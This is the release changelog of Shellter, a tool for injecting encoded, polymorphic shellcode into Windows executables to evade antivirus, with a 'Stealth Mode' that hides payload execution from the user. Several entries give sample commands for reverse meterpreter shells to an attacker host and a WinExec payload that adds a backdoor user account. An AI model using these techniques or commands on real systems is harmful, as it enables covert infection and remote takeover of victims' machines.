Updates

Shellter v7.1
Date: 01d/12m/2017
[+] Fixed a bug in the last stage of Stealth Mode.
This was due to rarely manifested issue that would cause an ERROR_INVALID_USER_BUFFER Windows error (code: 1784).
[+] Fixed a tracer issue in Windows 10.
Noticed that in Windows 10 Shellter would detect a few spawned system threads during process initialization.
However, because this happens before the actual tracing starts if the user disables tracing of all threads via Manual Mode, or the target is a DLL, and/or DTCK is enabled, then the tracing stage stops before even starting.
This happens because in those cases Shellter will stop tracing once an additional thread is created. Since those system threads are irrelevant with Shellter’s technical details, the tracer was updated to ignore those system threads on process initialization.
[+] Fixed Windows error codes translation to error messages in Windows 10.
[+] Fixed console and font size adjustment in Windows 10.
[+] Other minor adjustments.
Release: Public


Shellter v7.0
Date: 18d/07m/2017
[+] Maintenance release that includes bug fixes and minor improvements that were addressed during the development of Shellter Pro between versions 1.0 to 2.2.


Shellter VI [6.9]
Date: 27d/02m/2017
[+] Fixed a NULL pointer dereference bug in the function that parses the exports table of reflective DLLs used as payloads and calculates the offset of the reflective loader function. This would normally trigger if the user submitted a packed DLL with the exports table preserved. In that case the exported function would be located but further information extraction would fail due to the packed state of the PE file.  Shellter will now handle this and report an error message. However, it is not recommended to submit packed PE files.
 Reported by: Max Alex
[+] Added some extra proprietary error codes to assist troubleshooting in case a related bug is reported.
[+] Added some extra checks in the command line parser for ‘––polyIAT’ and ‘––polyDecoder’ arguments.
Shellter will now verify that ‘––handler IAT’ and/or ‘––encode’ arguments have been set before using any of the aforementioned obfuscation enabling arguments.
[+] Minor updates in the function that adjusts the embedded payloads.
[+] Other minor updates.
[+] The displayed in-app logo was changed with a more minimalistic one which fits a lot better the console view of the application.
Release: Public


Shellter VI [6.8]
Date: 01d/11m/2016
[+] Fixed a bug related to processing custom payload filenames in Manual Mode. Auto Mode was not affected.
The buffer storing the filename was not re-initialized in case the first attempt to define the filename failed.
Reported by: @fancy__04
[+] Command line parser updates regarding the ‘––Reflective’ <FunctionName> parameter/argument. The parser will now make a couple of extra checks to make sure that it has been used correctly.
[+] Fixed a potential file handle leak in the function that reads a custom payload from a file.
[+] Other minor updates.
Release: Public


Shellter VI [6.7]
Date: 05d/10m/2016
[+] Minor updates related to size checks of custom payload and polymorphic code files submitted by the user.
[+] Fixed a file handle leak in the function that validates the file size of the custom payload file.
[+] Minor documentation updates.
[+] Other minor updates.
Release: Public


Shellter VI [6.6]
Date: 14d/09m/2016
[+] Fixed a command line parsing bug that wouldn’t allow to use reflective DLLs as payloads when using auto mode in conjuction
with command line arguments.
[+] Added a note about ‘––lhost’ parameter in the help menu.
[+] Other minor updates.
Release: Public


Shellter VI [6.5]
Date: 14d/05m/2016
[+] Fixed a logic error in the IAT Handlers feature.
Under certain conditions, Shellter might have used the unicode version of GetModuleHandle function with an IAT Handler stub dedicated for the Ascii input version of it.
[+] Fixed a typo issue in the command line parser that  wouldn’t allow to set the embedded bind_shell_tcp stager as payload from the command line.
[+] Fixed a logic error in the command line parser that was triggered when specifying first ‘––stealth/-s’ and then ‘––handler iat/section’ arguments. When stealth mode is enabled, the iat type handler is automatically set, so there is no need to be specified by the user. In this case the parser would enter the execution path to check the handler type specified, but since that was already set it would be treated  as new argument which is invalid by itself.
[+] Added “[stager]” indicator next to the name of the appropriate embedded payloads.
[+] Other minor updates and optimizations.
Release: Public


Shellter VI [6.4]
Date: 30d/04m/2016
[+] Fixed a bug in the ‘Time Travel’ feature.
In case Shellter doesn’t find an appropriate location, based on the traced execution flow, to inject the generated code along with the payload, then it restores a previous state. This allows the user to re-configure what to inject. However, due to an error in sanitizing some variables, the new injection attempt would fail anyway.
[+] Fixed a bug that caused a “RMEM_ERROR_01” type error when using Shellter in Wine. This bug was introduced in the previous update by not correctly updating a variable after applying some updates in the code.
[+] Fixed an update regarding enabling the SE_DEBUG_NAME privilege to solve some rare cases where the traced application might further restrict the access to its own object.
[+] Multiple optimizations in the tracing engine.
[+] Other minor updates.
Release: Public


Shellter VI [6.3]
Date: 20d/04m/2016
[+] Fixed a bug in the validation of the user-supplied encoding sequence in Manual Mode.
[+] Several optimizations in the tracing engine.
[+] Minor updates and optimizations.
Release: Public


Shellter VI [6.2]
Date: 27d/03m/2016
[+] Optimizations in thread-context-aware polymorphic code engine.
[+] Minor speed optimizations in the tracing engine.
[+] If Shellter finds a dropped DisASM.dll that is not being used by another instance of Shellter, then it will replace it and load the new copy.
[+] Enhanced backup functionality.
Shellter will now create a ‘Shellter_Backups’ directory and will move there the original PE files. If the user intentionally re-infects the same PE file, Shellter will not overwrite anymore the original backup, but it will notify the user about the fact that the current PE file in use might be infected already.
[+] Shellter will now enable the SE_DEBUG_NAME privilege when running as Administrator. This solves some situations where Shellter cannot detach from the child process to complete the payload injection if the latter modifies the ACEs in its own ACL with more restrictive permissions.
[+] Added extra system-defined error message formatting.
Shellter will display an additional human readable explanation defined by Windows OS, based on the error code number. This can assist the user to troubleshoot some issues that are not actually bugs in Shellter.
[+] Addressed some extra SDL checks.
[+] Various internal updates and optimizations.
Release: Public


Shellter VI [6.1]
Date: 20d/02m/2016
[+] Minor documentation updates.
[+] Minor updates and optimizations.
Release: Public


Shellter VI [6.0]
Date: 23d/01m/2016
[+] Extra IAT handler for encoded payloads and Stealth mode support.
Shellter can now also use a ‘GetModuleHandle/GetProcAddress’ combination, and brings the total number of available IAT handlers to eight. This increases Stealth mode compatibility with even more PE files.
[+] Optional ‘Online version check’ feature.
When using Manual mode, or Auto mode without command line arguments, Shellter will ask for the user’s authorization to perform this check. When command line arguments are used, this feature is disabled by default, but it can be enabled by adding the ‘––VersionCheck’ switch along with the rest of the arguments.
This feature is not available from Wine mode.
[+] Extra validation check in the third stage filtering that picks the available injection locations for DTCK usage.
[+] Extra validation check for virtual address ranges selection used by several functions of the engine that generates polymorphic code for obfuscation purposes.
[+] Before accessing a target file, Shellter will attempt to change its attributes to FILE_ATTRIBUTE_NORMAL.
Some files might have some extra attributes enabled, such as ‘READ_ONLY’ which are preserved when we copy a file from one directory to another. By enabling Shellter to change these attributes, we ensure that the user doesn’t have to be aware of this issue, thus eliminating usage problems.
[+] Various internal updates and optimizations.
Release: Public


Shellter V [5.9]
Date: 20d/12m/2015
[+] Enhanced thread-context-aware polymorphic code engine.
More instructions are now supported, to produce an even more randomize output.
[+] Various internal updates and optimizations.
Release: Public


Shellter V [5.8]
Date: 22d/11m/2015
[+] Command line parser modifications.
A few changes have been made in the command line parser to ensure that certain arguments are passed in a specific order. This modification will later serve one of the new features of the upcoming advanced edition of Shellter. In particular, when specifying one of the embedded payloads, then the options for that payload (––lhost, ––port, ––cmd) must now follow immediately after.

Examples:
–p meterpreter_reverse_tcp ––lhost 192.168.0.9 ––port 3465
–p meterpreter_bind_tcp ––port 4565
–p winexec ––cmd “cmd.exe /c net user evil password /ADD”

[+] Shellter will now exit automatically when command line arguments have been used, in order to facilitate its usage through scripting.
[+] When ‘–h/––help’ and ‘––examples’ command line arguments are used, Shellter will now print all the output at once, so that the user can easily save it into a file and read it from there.
[+] List of usage examples has been updated.
Run Shellter using ––examples argument to display them.
[+] Minor updates/corrections in the documentation and in the help menu. Run Shellter using –h/––help arguments to display the list of supported arguments with further explanation.
[+] Various internal updates and optimizations.
Release: Public


Shellter V [5.7]
Date: 14d/11m/2015
[+] Enhanced thread-context-aware polymorphic code engine.
More instructions supported with even more randomized output.
[+] Optimized CTRL event listener.
In tracing mode, the user can still interrupt that stage and proceed with the rest of the injection process by pressing CTRL+C, but after this stage Shellter disables processing CTRL+C as a signal in order to protect itself from being accidentally terminated during the injection stages. In case an error occurs, or at successful completion of injection, processing of CTRL+C is re-enabled.
[+] Automatic deletion of the dropped Disasm.dll module even when Shellter is terminated by closing the console window.  If multiple instances of Shellter are running, then the aforementioned module will be deleted once the last instance of Shellter is terminated.
Note: This doesn’t apply in case Shellter is terminated by another process, such as the task manager.
[+] Added a user reminder at the PE file backup stage.
Always remember that the .bak file is the previous state of what you are going to generate. In other words, the first time you infect a PE file, the .bak file is the clean PE file. If you decide to add another payload to that PE file, then the new .bak file is the PE file already infected with one payload.
[+] Updated section 8 of the current documentation (readme.txt) file.
[+] Various internal updates and optimizations.
Release: Public


Shellter V [5.6]
Date: 07d/11m/2015
[+] Added an extra verification check over the user-defined encoding-sequence feature that checks for insecure concatenations of encoding operators. It aims to protect this feature from being used in a totally wrong way.
However, it is still recommended that this feature should only be used by advanced users.
[+] Fixed an error in the user-defined-encoding-sequence buffer initialization which could cause later to ignore the user supplied
sequence and trigger the random encoding scheme generation from Shellter. In that case the payload would be encoded, but without using the encoding scheme that was defined by the user.
[+] Decreased the maximum of extra delay that is applied before the execution of the payload, when Stealth mode is not enabled.
[+] Several internal optimizations.
Release: Public


Shellter V [5.5]
Date: 31d/10m/2015
[+] Fixed an error in the user-defined-encoded-sequence parser that would make Shellter recognize valid sequences as invalid, thus making this feature unusable from Manual mode.
Reported by: @fancy__04
Note: Before using this feature, it is recommended that you read about it in the documentation regarding Shellter’s proprietary encoder. This feature should only be used by advanced users.

[+] Updated the XOR encoding operator from ‘^’ to ‘x’.
The original operator was fine when testing this new feature from visual  studio, but apparently using the ‘^’ character in Windows command prompt is really a bad idea. I totally forgot about this since, Visual Studio uses the command line as a parameter to CreateProcess(), which in that case there is no issue. The impact was that the XOR operations were  eliminated from the supplied encoding sequence when using the command line.

Example using the new XOR operator:  ––encode {!x-x+}

[+] Applied all relevant documention updates.
Release: Public


Shellter V [5.4]
Date: 31d/10m/2015
[+] User Defined Encoding Sequence. – Bug! Skip this version!!!
This feature allows the user to optionally choose a personalised encoding scheme based on the supported encoding operators.
In Manual Mode, Shellter will ask the user to enable this feature or not. In Auto mode, this feature is only available through the command line by extending the ––encode switch with the encoding sequence between ‘{}’. When the user specifies the encoding sequence in Manual mode, then the ‘{}’ characters must not be entered.

Auto mode – Command line Example: ––encode {!^+}
Manual mode – Enter Encoding Sequence: !^+

When Auto mode is used through the command line, if the user only sets the ––encode switch without specifying an encoding scheme, Shellter will build its own random encoding sequence as it was done
until now.
Note: Before using this feature, it is recommended that you read about it in the documentation regarding Shellter’s proprietary encoder. This feature should only be used by advanced users.
[+] Help menu updates.
[+] A few updates/corrections in the documentation (readme.txt) file.
[+] Updated usage examples with proper explanation on the given command line. Run shellter with the ––examples switch to display them.
[+] Various internal updates and optimizations.
Release: Public


Shellter V [5.3]
Date: 24d/10m/2015
[+] Enhanced ‘Junk’ and ‘Thread Context Aware’ Polymorphic code generation engines. More instructions are now supported for a more randomized output.
[+] Ultra fast polymorphic code generation.
[+] Tracing Engine modifications.
Up to version 5.2 Shellter would keep tracing the main thread even if more than one threads were created while the user had chosen to trace only the main one. This could potentially cause some issues, since during execution flow filtering Shellter would be not aware of what and where was executed in another thread.
From version 5.3 if the user chooses to only trace the main thread, or log dynamic thread context information to use dynamic thread context keys, then once a new thread is created Shellter will exit the tracing stage in order to be able to provide more reliable results during the execution flow filtering.
In Auto Mode All-Threads-Tracing is enabled by default, but if command line is used, then it can be disabled using the ‘––trace main’ switch. In Manual Mode, Shellter will ask the user to choose between the two.
[+] Fixed a design error that was introduced by a recent update
which would allow a user to specify an empty ‘CMD’ command string when the embedded WinExec payload was used.
[+] Various internal updates and optimizations.
Release: Public


Shellter V [5.2]
Date: 11d/10m/2015
[+] Added domain names support for the embedded Meterpreter_Reverse_HTTP/HTTPS payloads.
Read here for more information.
Note:
You can always use domain names even with payloads not embedded in Shellter. You just need to generate the payload in raw format so that you can feed it to Shellter as a file. This was always supported.
[+] Introduced the ––lhost switch for specifying the attacker’s server by IP or domain name.
[+] The ––ip switch has been dropped (see above).
[+] Introduced ––examples switch to show usage examples which were previously shown in the help menu.
[+] Enhanced command line parser.
Added some extra checks over the supported arguments. Shellter will notify the user in case a switch/option specified is either not supported or potentially not used correctly.
[+] Fixed a design issue that wouldn’t allow the user to choose one of the embedded payloads if the name was mistyped in the command line. In that case Shellter would only accept a payload from a file. This has now been fixed so that if the user mistyped either the name of the embedded payload or the name of the file containing the payload data; Shellter will always give the option to choose again between a listed or a custom one.
[+] Fixed a potential usage of an unitialized pointer while reading the payload data from a file when specific settings were enabled.
[+] A few updates/corrections in the documentation (readme.txt) file.
[+] Various internal updates and optimizations.
Release: Public


Shellter V [5.1]
Date: 12d/08m/2015
[+] Fixed a shared-access-violation issue during injection stage, which was occasionally caused by a Close/Open file handle race condition when Stealth Mode was enabled.
[+] Fixed an issue with the embedded WinExec payload which would cause the process of the infected PE file to be terminated after the execution of the payload had finished, even though Stealth Mode was used.
[+] Default time tracing in Auto Mode is 30 seconds when using Shellter inside native Windows hosts and 60 seconds when using Shellter in Wine. I decided to increase the tracing time in the second case because the whole tracing process is much slower in Wine. In this way we manage to compensate against the slower tracing speed that is inevitable when we use Shellter in Wine.
[+] Minor changes, fixes, optimizations.
Release:  Public


Shellter V
Date: 08d/08m/2015
[+] Stealth Mode.
This is a major upgrade that combines dynamic PE infection with a RedTeam functionality. This means that while you are not losing any of the unique benefits of the dynamic PE infection that Shellter provides, you can also preserve the original functionality of the infected application.
This means, that the application will run as it should, while the execution of the payload is completely transparent to the user.
When you enable this feature, Shellter automatically enables its own encoder and IAT type handling. In a few words, when Stealth Mode is enabled the ––enc, ––encode, and handler ––IAT flags are automatically set. So you don’t have to specify them yourself.

Example: shellter -f <target.exe> -p <payload.bin> ––stealth ––polydecoder  ––polyiat ––junk

Example: shellter -f <target.exe> -p meterpreter_reverse_tcp ––port 4545 ––ip 192.168.0.6 ––stealth ––polyIAT ––polyDecoder ––junk

Important: Take a look at the documentation of this feature in readme.txt, before using Stealth Mode.

[+] Dynamic Injection of Multiple Payloads.
Thanks to the combination of the Stealth Mode with the dynamic PE infection that Shellter provides, you can infect multiple times the same PE file using different payloads as long as you always enable the Stealth Mode feature.
For example, you can inject a “meterpreter_reverse_tcp” stager and then infect again the same PE file with an “Add User” payload, and so on. Every layer of infection will be using a unique dynamic approach with a different encoding, a randomly picked up IAT handler, and extra obfuscation if you choose to apply this by using the ––polyDecoder and ––polyIAT switches. In addition, you can use the ––junk switch to add some extra junk polymorphic code.

[+] Added -s / ––stealth command line switches to enable Stealth Mode when using Shellter from the command line.
[+] Added option to enable Stealth Mode feature from the Manual Mode, and from the Auto Mode when command line arguments have not been used.
[+] Deletes dropped Disasm.dll when Shellter terminates normally.
[+] Various updates, fixes, optimizations.
New Features:  Stealth Mode, Multi-Payload dynamic PE Infection.
Release:  Public


Shellter v4.0
Date: 05d/07m/2015
[+] Custom Proprietary Encoder.
This a major upgrade that facilitates direct usage of non-encoded payloads generated by metasploit, or created by the user. Shellter will apply its own random dynamic encoding layer and will generate every time a new decoder based on that.
Cmdline switch: ––encode

[+] Polymorphic Decoder.
Shellter can apply an extra layer of obfuscation over the generated decoder by using thread context aware polymorphic code.
Cmdline switch: ––polydecoder

[+] Dynamic Thread Context Keys.
Another major upgrade and unique feature of Shellter. This feature automates the usage of dynamic thread context information of the
original execution flow of the application as encoding keys.
Cmdline switch: ––DTCK

[+] Reflective DLL loaders support.
Another major upgrade feature which allows the user not just to use raw shellcode, but even an entire DLL file that contains a reflective loader function.
The user can even choose to encode the entire DLL by using Shellter’s proprietary encoder as mentioned above.
Feature suggested by: Tom Wilson
Cmdline switch: ––reflective <FuncName>

[+] Embedded Payloads.
This new feature, allows the user to make use of some commonly used payloads without the need to generate them through metasploit. The user can choose to apply Shellter’s encoder as mentioned above.
It is always recommended to use encoded payloads. If a payload is not encoded, like those embedded in Shellter, then encode it through Shellter by using the ––encode cmdline switch.

Payloads List
——————
[1] meterpreter_reverse_tcp
[2] meterpreter_reverse_http
[3] meterpreter_reverse_https
[4] meterpreter_bind_tcp
[5] shell_reverse_tcp
[6] shell_bind_tcp
[7] WinExec

Examples:
-p meterpreter_reverse_tcp ––port 5656 ––ip 192.168.0.6
-p winexec ––cmd calc.exe

[+] Enhanced injection selection point.
This feature enhances the randomization regarding the injection point when using Shellter in Auto mode.

[+] Extra cmdline switches.
––list: Shows a list of the embedded payloads.
––encode: Apply Shellter’s encoder over the payload.
––polydecoder: Obfuscate the generated decoder by using thread context aware polymorphic code.
––DTCK: Experimental feature that uses dynamic thread context information from the original execution flow of the target PE as keys for payload encoding.
––reflective <FuncName>: Marks the submitted payload as a DLL and defines the function name of the reflective loader.
––ip: Specifies the IPv4 address used by the reverse connection payloads.
––port: Specifies the port number used by the reverse and bind connection payloads.
––cmd: Specifies the cmdline argument for the WinExec payload.

[+] All threads tracing is now enabled by default even when cmdline is used. Specifying ‘––trace all’ is now obsolete. However, the user can choose to only trace the main thread by specifying ‘––trace main’ in the cmdline. However, this is not recommended.
[+] Increased console buffer when using Shellter under Wine. The user can now scroll up the console output and review the available information.
[+] Fixed a bug that occasionally caused wrong adjustment of some injected random Call instructions during IAT handler obfuscation. This bug was eventually triggered with calc.exe and notepad.exe only when the aforementioned feature was used, so it took some time to realize its existence.
[+] Various optimizations, changes, and bug fixes.
New Feature:  Multiple
Release:  Public


Shellter v3.1
Date: 30d/05m/2015
[+] Automatic adjustment of the console fonts when running Shellter in Windows >= Vista. Applies also in Wine with the appropriate settings.
[+] Shellter console is now automatically positioned at the centre of the main monitor.
[+] Fixed a typo in IAT handler obfuscation stage: T.C.A was showing as C.T.A.
[+] Displays the amount of time elapsed during IAT handler obfuscation.
Release: Public


Shellter v3.0
Date: 18d/05m/2015
[+] Polymorphic IAT type handlers for encoded payloads.
This is a major upgrade which dramatically enhances polymorphism in the final output. This feature breaks down the stubs of those handlers and binds them with thread context aware polymorphic code.
[+] Introduced Auto/Manual mode selection.
This was a necessary change since the originally called ‘Basic’ mode was far from basic for some time now. So Basic/Advanced mode selection has been dropped.
[+] Introduced injection verification stage.
After successful injection, Shellter will verify that the first instruction of the injected code will be reached successfully.
If polymorphic code has been added, then the first instruction refers to that and not to the effective payload.
[+] Introduced ‘––polyIAT’ switch and the option to obfuscate the chosen IAT type handler in ‘Auto’ and ‘Manual’ modes respectively.
They both take advantage of the same feature.
Note: When using Auto mode without cmdline arguments, this feature is enabled by default. If cmdline arguments are used, the aforementioned switch has to be set to enable this feature.
[+] When using Shellter with Wine, the associated operation mode is not shown as ‘Beta’ anymore.
[+] Several optimizations in adjusting IAT type handlers.
[+] Several internal design optimizations.
[+] Some minor changes/updates/optimizations.
New feature: Thread Context Aware Polymorphic Engine
Release: Public


Shellter v2.2
Date: 07d/02m/2015
[+] Automatic Backup of the original PE file.
[+] Minor changes in error-display notifications.
Release: Public


Shellter v2.1
Date: 01d/02m/2015
[+] Fixed a couple of potentially bug causing issues.
[+] Added several extra checks to enhance error handling during injection stage.
[+] Displays the name of the PE section where the shellcode was
injected.
[+] Minor updates/optimizations.
Release: Public


Shellter v2.0
Date: 16d/12m/2014
[+] Added user notification about the minimum required Win OS version for the target PE.
This allows the user to avoid situations where he makes use of an application that will not run properly in the victim host in case there is an earlier version of Windows.
[+] Enhanced UI with more user-friendly output.
[+]
Cmdline updates.
Changed help menu switch to ‘–h’ and ‘––help’, and verbose

mode to ‘–v’
[+]
Completely removed manual tracing engine selection.
Shellter will pick up the appropriate one depending on whether you run it in a native Windows host or in Wine.
This means that the user is no longer allowed to select the Wine compatible engine when running Shellter in a native Windows host.
[+] All-threads tracing option is not shown as ‘Beta’ feature.
[+] Various optimizations in both tracing engines.
[+] Updated Wine/Crossover compatible tracing engine.
Solved compatibility issues with some applications, and some known issues that were mentioned in the previous updates.
[+] Fixed a shared access violation issue that occured sometimes when updating the CheckSum field in the PE header.
This issue didn’t affect the rest of the injection process.
[+] Added an icon in the executable.
Release: Public


Shellter v1.9
Date: 22d/11m/2014
[+] Automated usage of encoded-payload handlers in Basic Mode.
Even when operating under Basic Mode, Shellter will take advantage of this feature that was only available from Advanced Mode so far.
Shellter will only change section’s permissions if the PE target doesn’t support any of the available methods, or if the user changes this setting from the cmdline.
[+] Enhanced cmdline support.
Allows the user to customise Basic Mode operation and make use of some features and options that were previously only available in Advanced Mode.
*Note: When using the Basic Mode with cmdline flags, if an
encoded payload is specified then the user needs to set
both the ‘––enc’ flag as well as the ‘––handler’.
Start Shellter using ‘––h’ to see how to use the cmdline
options.
[+] Fixed a potential read-out-of-bounds issue in the cmdline parser.
[+] Minor UI and internal optimizations.
Release: Public


Shellter v1.8
Date: 01d/11m/2014
[+] Merged Native Windows & Windows/Wine Tracing Engines.
[+] Added command line support for the Basic Mode.
[+] Added option to choose Tracing Engine. Only applies under Native Windows.*
Start Shellter using ‘––h’ argument to get more information regarding the supported arguments.
[+] Removed tracing option: ‘Start Trace from EntryPoint/System DLL’.
New Feature:  Basic Mode Command Line Support.
Release: Public

Knows issues: See notes in the previous update regarding the Windows/Wine tracing engine. These issues don’t apply when choosing the Native Windows tracing engine.

*Note: When running under Wine, the Tracing Engine is selected automatically.

Shellter v1.7 Wine Beta #1
Date: 12d/08m/2014
[+] Native Windows & Wine/CrossOver Compatible.
[+] Optimized tracer.
Up to 3 times faster when tracing over code that makes frequent calls to functions outside the PE image. Testing has been applied using this build vs the Windows-Only build by tracing the same PE target for a relatively big number of instructions.
[+] Removed tracing option: ‘Start Trace from EntryPoint/System DLL’.
This option was mostly for testing and it will probably be replaced with another. This option is still available in the Windows-Only compatible build.
Release: Public

Known issues: In some cases, the tracer might return RMEM_ERROR_02 and stop tracing. You can still use the traced execution flow up to that point and proceed with the injection stage.
I am currently trying different approaches to solve issues that might influence the tracing stage, even though these are quite rare.
These issues don’t apply in the Windows-Only compatible build.


Shellter v1.7
Date: 06d/08m/2014
[+] Minor updates/optimizations.
Release: Public


Shellter v1.6
Date: 04d/08m/2014
[+] Fixed a potential uninitialized variable access issue.
[+] Minor updates in PE file validation method.
[+] Other minor updates/optimizations.
Release: Public


Shellter v1.5
Date: 02d/08m/2014
[+] Fixed a potential error issue during process creation.
[+] Added CREATE_NEW_CONSOLE flag to avoid I/O issues when tracing console applications.
[+] Fixed a potential invalid pointer dereference issue when parsing a handcrafted PE.
Release: Public


Shellter v1.4
Date: 28d/07m/2014
[+] Fixed not showing logo issue when running Shellter in low resolution.
Reported by: Nikolaos Tsapakis
Release: Public


Shellter v1.3
Date: 26d/07m/2014
[+] Added timed tracing in Basic Mode.
Shellter will trace a random number of instructions, for a maximum time of approximately 30 seconds.
Release: Public


Shellter v1.2
Date: 06d/07m/2014
[+] Fixed file share permissions conflicts when injecting to some installers (NSIS).
Reported by: James Chapman
[+] Added user notification if EntryPoint is not located in the first section.
[+] Internal optimizations.
Release: Public


Shellter v1.1
Date: 21d/06m/2014
[+] Extra PE file validation. Ensure it is a 32-bit native executable.
[+] Minor changes in error notifications.
[+] Internal source code optimizations.
New Feature: Advanced/Basic Mode Selection.
Release: Public


Shellter v1.0
Date: 27d/05m/2014
Release: Public


Shellter v1.0 Beta
Date: 11d/05m/2014
[+] Minor Updates & Optimizations
New Feature: Change Section’s Permissions.
Release: Private


Shellter v1.0 (Build 107)
Date: 05d/05m/2014
[+] Minor Updates & Optimizations
[+] Encoded payload handler has been updated.
New Handler:
CreateFileMapping/MapViewOfFile
Release: Private


Shellter v1.0 (Build 104)
Date: 04d/05m/2014
[+] Minor Updates & Optimizations
New feature: Tracer Eliminates Basic Debugging Artifacts.
1) PEB.BeingDebugged
2) PEB.NtGlobalFlag
Release: Private


Shellter v1.0 (Build 102)
Date: 01d/05m/2014
[+] Minor Updates & Optimizations
New feature: Eliminate Digital Signature Artifacts.
Release: Private


Shellter v1.0 (Build 100)
Date: 30d/04m/2014
[+] Polymorphic engine has been updated.
New feature: Inject Random Memory Read/Write Instructions.
Release State: Private


Shellter v1.0 (Build 97)
Date: 27d/04m/2014
[+] Polymorphic engine has been updated.
New feature: Inject Random Call Instructions.
Release: Private


Private Shellter v1.0 [RC1]
Date: 26d/04m/2014
First release candidate is now ready to be tested for bugs.
The executable has been provided to a few people for further evaluation.
Release: Private

AV Evasion Artware